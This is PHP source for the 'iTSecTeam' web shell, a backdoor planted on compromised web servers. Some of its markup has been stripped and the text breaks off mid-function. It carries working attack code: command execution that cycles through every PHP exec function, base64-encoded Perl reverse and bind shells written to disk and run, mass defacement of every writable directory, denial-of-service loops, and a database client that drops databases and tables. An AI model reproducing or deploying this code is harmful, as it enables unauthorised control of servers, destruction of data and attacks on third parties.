iTSecTeam

	 ______  ______  ____                   ______                               
	/\__  _\/\__  _\/\  _`\                /\__  _\                              
	\/_/\ \/\/_/\ \/\ \,\L\_\     __    ___\/_/\ \/    __     __      ___ ___    
	   \ \ \   \ \ \ \/_\__ \   /'__`\ /'___\ \ \ \  /'__`\ /'__`\  /' __` __`\  
		\_\ \__ \ \ \  /\ \L\ \/\  __//\ \__/  \ \ \/\  __//\ \L\.\_/\ \/\ \/\ \ 
		/\_____\ \ \_\ \ `\____\ \____\ \____\  \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
		\/_____/  \/_/  \/_____/\/____/\/____/   \/_/\/____/\/__/\/_/\/_/\/_/\/_/

"; //++++++++++++++++++++ Init +++++++++++++++++++++ if ($_REQUEST['address']){ if(is_readable($_REQUEST['address'])){ chdir($_REQUEST['address']);} else{ alert("Permission Denied !"); } } session_start(); set_time_limit(0); if ($loginPassword and $_SESSION['Login']!="ok"){ Check_Password($_POST['password']); $passwordTitle='Change Password'; } function Check_Password($password){ global $loginPassword; if (md5($password)==$loginPassword){ $_SESSION['Login']="ok"; }elseif(strlen($password)>=1){ echo ""; } if ($_SESSION['Login']!="ok"){ echo "Plase Insert Password
"; exit; } } //error_reporting(0); $myUrl=$_SERVER['PHP_SELF']; $formPost="

"; $formGet=""; $nowAddress=''; $baseAddress=$_SERVER['DOCUMENT_ROOT']; if (get_magic_quotes_gpc()){ //Disable Magic Quote In RunTime function stripslashes_deep($value){ $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value; } $_POST = array_map('stripslashes_deep', $_POST); $_GET = array_map('stripslashes_deep', $_GET); $_COOKIE = array_map('stripslashes_deep', $_COOKIE); $_REQUEST = array_map('stripslashes_deep', $_REQUEST); } if(strtolower(substr(PHP_OS, 0, 3)) == "win"){ $slash="\\"; $baseAddress=str_replace("/","\\",$baseAddress); $sampleCommand='dir'; define("Is_Win",1); }else{ $slash="/"; $baseAddress=str_replace("\\","/",$baseAddress); $sampleCommand='ls -la'; } if(ini_get('disable_functions')){ $disableFunctionList=ini_get('disable_functions'); }else{ $disableFunctionList="All Functions Enable"; } if(ini_get('safe_mode')){ $safe_mode="On"; }else{ $safe_mode="Off"; } if($cwd==''){ $cwd=getcwd(); } //-------------------- Init --------------------- //++++++++++++++++++++ Html Source ++++++++++++++++++++++ if($_SESSION['Login']=='ok'){ $passwordTitle='Change Password'; }else{ $passwordTitle='Set Password'; } $head=' iTSecTeam

Home -- File Manager -- Command Execute -- Back Connect -- BypasS Command eXecute(SF-DF) -- Symlink -- BypasS Directory -- Eval Php -- Data Base -- Convert -- Mail Boomber
Server Information -- Dos Local Server -- Backup Database -- Mass Deface -- Download Remote File -- DDoS -- Find Writable Directory -- MultiUpload
Port Scanner -- Set Cookie -- Processes List -- User List -- Zone-H Submiter -- '.$passwordTitle.' -- Server -- Remove Me -- About

Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_mode.'

'; $end='

'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'
'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'

'; $deny=$head."

Oh My God!
Permission Denied".$end; //-------------------- Html Source ---------------------- class FileManager{ function Remove_File($address){ //Remove File if (@unlink($address)) return true; } function Delete_Dir($dir){ //Remove Dir And All File List if (!is_writable($dir)) return false; if (!file_exists($dir)) return true; if (!is_dir($dir) || is_link($dir)) return unlink($dir); foreach (scandir($dir) as $item) { if ($item == '.' || $item == '..') continue; if (!$this->delete_dir($dir . "/" . $item)) { chmod($dir . "/" . $item, 0777); if (!$this->delete_dir($dir . "/" . $item)) return false; }; } return rmdir($dir); } function Download_File($file_address,$file_name){ //Send Header And Print File Contents For Download File global $slash; $full_address=$file_address.$file_name; header("Content-Disposition: attachment; filename=\"$file_name\""); header("Content-Type: application/download"); header("Content-Length: " . filesize($full_address)); flush(); $fp = fopen($full_address, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } function Download_Remote($url,$savePath){ //Download A File From Remote Url $newFileName = $savePath . basename($url); $file = fopen ($url, "rb"); if ($file) { $newFile = fopen ($newFileName, "wb"); if ($newFile){ while(!feof($file)) { fwrite($newFile, fread($file, 1024 * 8 ), 1024 * 8 ); } } alert("File Downloaded Successful"); }else{ alert("Can Not Open File"); } if ($file) { fclose($file); } if ($newFile) { fclose($newFile); } } function Copy_Dir($sourceDir,$destDir) { global $slash; $handleDir = opendir($sourceDir); while (($files = readdir($handleDir)) !== FALSE) { if (($files != ".") and ($files != "..")) { if (!is_dir($sourceDir.$slash.$files)){ $ret = copy($sourceDir.$slash.$files,$destDir.$slash.$files); }else{ $ret = mkdir($destDir.$slash.$files); $this->Copy_Dir($sourceDir.$slash.$files,$destDir.$slash.$files); } if (!$ret){ return $ret; } } } closedir($handleDir); return TRUE; } function Move_Dir($sourceDir,$destDir) { global $slash; $destDir.=$slash.basename($sourceDir); if(!is_dir($destDir)){ if(!mkdir($destDir)){ return false; } } if(is_writeable($destDir) && is_readable($sourceDir)){ $handleDir = opendir($sourceDir); while (($files = readdir($handleDir)) !== FALSE) { if (($files != ".") and ($files != "..")) { if (!is_dir($sourceDir.$slash.$files)){ $ret = copy($sourceDir.$slash.$files,$destDir.$slash.$files); }else{ $ret = mkdir($destDir.$slash.$files); $this->Copy_Dir($sourceDir.$slash.$files,$destDir.$slash.$files); } if (!$ret){ return $ret; } } } closedir($handleDir); $this->Delete_Dir($sourceDir); return TRUE; }else{ return false; } } function Copy_File($fileSource,$fileDest,$fileName){ //Copy A File To Dir global $slash; $source=Read_File($fileSource); if($fileName){ $fileName=$fileName; }else{ $fileName=basename($fileSource); } if(Write_File($fileDest.$slash.$fileName,$source)){ return true; }else{ return false; } } function Rename($oldName,$newName){ //Rename File if(@rename($oldName,$newName)) return true; } function Move_File($fileSource,$fileDest){ if(is_file($fileSource) && is_writeable(str_replace(basename($fileDest),"",$fileDest))){ if ($this->Copy_File($fileSource,$fileDest,"")){ if($this->Remove_File($fileSource)){ return true; } }else{ return false; } } } function FindPermDir($dirAddress){ //Find All Writeable Dir global $slash; $idd=0; if ($dirhen = @opendir($dirAddress)) { while ($file = readdir($dirhen)) { $permdir=str_replace('//','/',$dirAddress.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { $dirdata[$idd]['diraddress']=$dirAddress; $dirdata[$idd]['dirname']=$file; $idd++; } $this->FindPermDir($permdir); } } closedir($dirhen); } else { return ("notperm"); } if ($dirdata){ return $dirdata; }else{ return "notfound"; } } function MassDef($address,$pageName,$pageSource){ //Create A Page To All Dir And Sub Dir global $slash; $idd=0; if ($dirhen = @opendir($address)) { while ($file = @readdir($dirhen)) { if($file=="." or $file=="..") continue; $permdir=str_replace('//','/',$address.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { if ($fm=fopen($permdir.$slash.$pageName,"w")){ fwrite($fm,$pageSource); fclose($fm); $dirdata[$idd]['filename']=$permdir; } $idd++; } $this->MassDef($permdir,$pageName,$pageSource); } } closedir($dirhen); }else{ return false; } if ($dirdata){ return true; }else{ return false; } } function Back($nowDir){ //Return Back Address global $slash; //if (strlen($nowDir)<=4){ // return "showdrivelist"; //} $splitAddress=explode($slash,$nowDir); $lastSplit=count($splitAddress)-1; $back=(substr($nowDir,0,strrpos($nowDir,$splitAddress[$lastSplit])-1)); if (!is_win){ $back=str_replace("\\","/",$back); } return $back; } } class DD0S{ function D0s5_3_Local(){ //DD0s Local Server Worked In Version 5.3.X $junk=str_repeat("99999999999999999999999999999999999999999999999999",99999); for($i=0;$i<2;){ $buff=bcpow($junk, '3', 2); $buff=null; } } function D0s4_Local(){ //DD0s Local Server Worked In Version 4.x.x $this->D0s4_Local(); } function D0s_Remote($address,$time){ //DD0s Remote Address for ($id=0;$$id datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x0a\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $ext = "\x00\x00\x10\x00"; $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function add_file($data, $name){ $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= "\x00\x00\x00\x00"; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= $zdata; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x14\x00"; $cdrec .="\x00\x00"; $cdrec .="\x08\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",$crc); $cdrec .= pack("V",$c_len); $cdrec .= pack("V",$unc_len); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("V", 32 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file(){ $data = implode("", $this -> datasec); $ctrldir = implode("", $this -> ctrl_dir); return $data. $ctrldir. $this -> eof_ctrl_dir. pack("v", sizeof($this -> ctrl_dir)). pack("v", sizeof($this -> ctrl_dir)). pack("V", strlen($ctrldir)). pack("V", strlen($data)). "\x00\x00"; } } class BackConnect{ function Back_Connect_Perl($ip,$port){ $back_connect_script="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3 NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0 KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4 ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; check_error(Write_File("bcc.pl",base64_decode($back_connect_script)),'File Write'); check_error(@system("perl bcc.pl $ip $port"),"Connect"); } function Bind_Port_Perl($port){ $bind_port_script="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; check_error(Write_File("wbp.pl",base64_decode($bind_port_script)),'File Write'); check_error(@system("perl wbp.pl $Port"),"Bind Port"); } function Bind_Port_Perl2($port){ $bind_port_script="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7 b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g"; check_error(Write_File("lbp.pl",base64_decode($bind_port_script)),'File Writ'); check_error(@system("perl lbp.pl $port"),"Bind Port"); } } class Theme{ function Dir($dirAddress,$dirName,$color){ global $slash,$cwd; $fullDir=$dirAddress.$dirName; return '
'.$dirName.' '.date("y/m/d", filectime($fullDir)).' '.substr(sprintf('%o', fileperms($fullDir)), -3).' DL Move Copy Ren Del
'; } function Move($dirAddress,$dirName,$color){ global $slash,$cwd; $fullDir=$dirAddress.$dirName; return '
'.$dirName.' '.date("y/m/d", filectime($fullDir)).' '.substr(sprintf('%o', fileperms($fullDir)), -3).'
'; } function Copy($dirAddress,$dirName,$color){ global $slash,$cwd; $fullDir=$dirAddress.$dirName; return '
'.$dirName.' '.date("y/m/d", filectime($fullDir)).' '.substr(sprintf('%o', fileperms($fullDir)), -3).'
'; } function CopyDir($dirAddress,$dirName,$color){ global $slash,$cwd; $fullDir=$dirAddress.$dirName; return '
'.$dirName.' '.date("y/m/d", filectime($fullDir)).' '.substr(sprintf('%o', fileperms($fullDir)), -3).'
'; } function MoveDir($dirAddress,$dirName,$color){ global $slash,$cwd; $fullDir=$dirAddress.$dirName; return '
'.$dirName.' '.date("y/m/d", filectime($fullDir)).' '.substr(sprintf('%o', fileperms($fullDir)), -3).'
'; } function File($address,$fileName,$color){ global $slash,$cwd,$baseAddress; $fullFile=$address.$slash.$fileName; if(strlen(strpos($address,$baseAddress))>=1){ $dir=str_replace($baseAddress,"",$address); $dir=str_replace("\\","/",$dir); $fileAddress=''.$fileName.''; }else{ $fileAddress=''.$fileName.''; } return '
'.$fileAddress.' '.calc_size(filesize($fullFile)).' '.date("y/m/d", filectime($fullFile)).' '.substr(sprintf('%o', fileperms($fullFile)), -3).' Edit DL Move Copy Ren Del
'; } function Main($source,$formType){ global $head,$end,$nowAddress,$formGet,$formPost; if ($formType=="post"){ $form=$formPost; $endForm=""; }elseif($formType="get"){ $form=$formGet; $endForm=""; } return $head.$form.$nowAddress.'

'.$source.'

'.$endForm.$end; } } class Execute{ function Check_All($command){ if($res=$this->Passthru($command)){ return $res; }elseif($res=$this->Exec($command)){ return $res; }elseif($res=$this->System($command)){ return $res; }elseif($res=$this->Shell_Exec($command)){ return $res; }elseif($res=$this->Proc_Open($command)){ return $res; }elseif($res=$this->Popen($command)){ return $res; } } function Passthru($command){ if(@function_exists("passthru")){ ob_start(); @passthru($command); $res=ob_get_contents(); ob_end_clean(); return $res; }else{ return false; } } function Exec($command){ if(@function_exists("exec")){ @exec($command,$res); $res=join("\n",$res); return $res; }else{ return false; } } function System($command){ if(@function_exists("system")){ ob_start(); @system($command); $res=ob_get_contents(); ob_end_clean(); return $res; }else{ return false; } } function Shell_Exec($command){ if(!$res=@shell_exec($command)) return false; return $res; } function Proc_Open($command){ $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if($opproc=@proc_open($command,$dep,$pipes)){ while(!feof($pipes[1])){ //$line=fgets($pipes[1]); $res.=fgets($pipes[1]); } proc_close($opproc); return $res; }else{ return false; } } function Popen($command){ if(is_resource($opopen = @popen($command,"r"))){ while(!feof($opopen)) { $res=$res.fread($opopen,1024); } pclose($opopen); return $res; }else{ return false; } } } $CMD= new Execute(); $THEME = new Theme(); $FILEMANAGER = new FileManager(); //++++++++++++++++++++ Function List +++++++++++++++++++++ $DirCount=0; $FileCount=0; function Split_Address($address){ global $slash; if (empty($address)){ $address = realpath("."); }elseif(realpath($address)){ $address = realpath($address); } if (substr($address,strlen($address)-1,1) != $slash){ $address .= $slash; } $pd = $e = explode($slash,substr($address,0,strlen($address)-1)); $i = 0; foreach($pd as $b) { $t = ""; reset($e); $j = 0; foreach ($e as $r) { $t.= $r.$slash; if ($j == $i){break;} $j++; } $returnAddress.= ''.$b.$slash.''; $i++; } return $returnAddress; } function calc_size($size){ //Calculate File Size To KB MB GB if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } function ListDir($address,$limit,$type){ global $DirCount,$FileCount; global $THEME,$cwd,$slash; $baseHandle=opendir($address); $counterColor1=0; if (dirCounter($address)%2){ $counterColor2=1; }else{ $counterColor2=0; } while (false !== ($tmpList = readdir($baseHandle))) { if ($tmpList != "." && $tmpList != "..") { if (filetype($tmpList)=="dir"){ //Dir List $DirCount++; if ($counterColor1 %2){ $color='"#e7e3de"'; }else{ $color='"#e2dfdd"'; } $counterColor1++; if($type=="move"){ $dirList.=$THEME->Move($cwd.$slash,$tmpList,$color); }elseif($type=="copy"){ $dirList.=$THEME->Copy($cwd.$slash,$tmpList,$color); }elseif($type=="copydir"){ $dirList.=$THEME->CopyDir($cwd.$slash,$tmpList,$color); }elseif($type=="movedir"){ $dirList.=$THEME->MoveDir($cwd.$slash,$tmpList,$color); }else{ $dirList.=$THEME->Dir($cwd.$slash,$tmpList,$color); } }else{ //File List $FileCount++; if ($counterColor2 %2){ $color='"#e7e3de"'; }else{ $color='"#e2dfdd"'; } $counterColor2++; $fileList.=$THEME->File($cwd.$slash,$tmpList,$color); } } } if($limit=="dir"){ $arrayList=array('dir'=>$dirList); }elseif($limit=="file"){ $arrayList=array('file'=>$fileList); }else{ $arrayList=array('file'=>$fileList,'dir'=>$dirList); } return $arrayList; } function ListDrive($address){ global $THEME,$cwd,$slash; foreach (range("A","Z") as $tempdrive) { if (is_dir($tempdrive.":".$slash)){ $driveName=$tempdrive.":".$slash; if ($counterColor1 %2){ $color='"#e7e3de"'; }else{ $color='"#e2dfdd"'; } $counterColor1++; $dirList.=$THEME->Dir($driveName.$slash,$driveName,$color); } } $arrayList=array('file'=>$fileList,'dir'=>$dirList); return $arrayList; } function Read_File($address){ if ($fp = @fopen($address, "r")){ while (!feof($fp)){ $source.=fread($fp, 65536); } fclose($fp); return $source; }else{ return false; } } function printdrive(){ //Return Drive List global $slash; foreach (range("A","Z") as $tempdrive) { if (is_dir($tempdrive.":".$slash)){ $driveName=$tempdrive.":".$slash; $listDrive=$listDrive.''.$tempdrive.':'.$slash.' '; } } return $listDrive; } function get_files_from_folder($directory, $put_into) { //Return File And Dir List For Zip Class global $zipfile; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (is_file($directory.$file)) { $fileContents = file_get_contents($directory.$file); $zipfile->add_file($fileContents, $put_into.$file); } elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) { $zipfile->add_dir($put_into.$file.'/'); get_files_from_folder($directory.$file.'/', $put_into.$file.'/'); } } } closedir($handle); } function input_hidden($name,$value){ //Insert Hidden TextBox Html return ''; } function Write_File($address,$source){ //Write File if($file_open=@fopen($address,"w")){ fwrite($file_open,$source); fclose($file_open); return true; }else{ return false; } } function GetProcesses(){ global $CMD; if(Is_Win){ $res=$CMD->Check_All("tasklist"); return $res; }else{ $res=$CMD->Check_All("ps -aux"); return $res; } } function drawImage($name){ //Print Header Pic For Show Base64 Picture $images=array("dir"=>'R0lGODlhDgAOAPcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmcwzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZzJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAGb//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZmM2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmTPMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMAzDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAABm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAMwAAAJ3B1o+2zFyHoE15kUBrhD9qgzVieyAvODVjfDRgeTNedj1nfz9rg0Fme1J8lSAwOU1yh12IoWKMo12DmG+asnSetWySqHGWq4Ksw4u2z3uht4+50YmxyIOovY20ypa9053E2pvA1ZO2ypq4yk14jx0tNX+mu////yH5BAEAAP8ALAAAAAAOAA4AAAiAAP8JHEiwoMGDCBHiW5jwX7yH8RLuy0axYjZ78ezZo7fPCraP2PLdGzmv5Dx57vTZU0mvZT168PzBc/evXj1/OOW1a8euJ7t1/94JdaeuqLp02pKi+8fPnNOn26JGLfdvHLluWLuR48aVWzeB4sB5G0uWbDiB/c59W8t2rdp/AQEAOw==' ,"file"=>'iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC' ,"back"=>'R0lGODlhFAAUAPcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmcwzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZzJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAGb//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZmM2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmTPMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMAzDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAABm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAMwAAAFGhzVSl0lSk0Vmo1lyq1Way3G654kKTu0OUvESUvEaXwEqbxkiZwUydx0qawk2dyFKizVSkz1akzF6s1mOv12q13Gm02nO94yt9ojCCpzGDqTWHrTaHrjaHrTeHqzuMsjqKrj+Qt0mZv12pzWOv06Sjo6Ojo////yH5BAEAAP8ALAAAAAAUABQAAAiWAP8JHEiwoEGD79YdXPjvXTd12BgadLcN27l9Ege2W4cNWzlz6s7lUceQX7pz48zpE5ev5T18evQdLEdOHEuX9ObZixcP38Fw33Dak8cTntF4B+/dyznQqFFk8JAalEe0IDyoRhdmteoUnlavXLdmbOp0LEFSYs3+K6t2Ldq2a9NmNGqPYb+7eK3o0WPFH96DeAMLJhgQADs='); header("Content-type: image/gif"); header("Cache-control: public"); header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); header("Cache-control: max-age=".(60*60*24*7)); header("Last-Modified: ".date("r",filemtime(__FILE__))); echo base64_decode($images[$name]); } function Check_Function($funcName){ //Check Function global $disableFunctionList; if (@in_array($funcName,$disableFunctionList)){ alert("Function Disable!"); return false; }elseif(!@function_exists($funcName)){ alert("Function Not Exist!"); return false; }else{ return true; } } function sqlclienT(){ //Echo Database Stuff global $t,$errorbox,$et,$hcwd; if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR']; } if (isset ($_GET[select_db])){ $getdb=$_GET[select_db]; $_SESSION[db]=$getdb; $query="SHOW TABLES"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[select_tbl])){ $tbl=$_GET[select_tbl]; $_SESSION[tbl]=$tbl; $query="SELECT * FROM `$tbl`"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[drop_db])){ $getdb=$_GET[drop_db]; $_SESSION[db]=$getdb; $query="DROP DATABASE `$getdb`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES'); } elseif (isset ($_GET[drop_tbl])){ $getbl=$_GET[drop_tbl]; $query="DROP TABLE `$getbl`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES'); } elseif (isset ($_GET[drop_row])){ 